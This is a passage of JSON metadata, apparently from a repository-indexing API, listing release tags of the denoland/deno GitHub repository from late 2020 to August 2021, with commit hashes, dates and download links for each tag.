4.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repo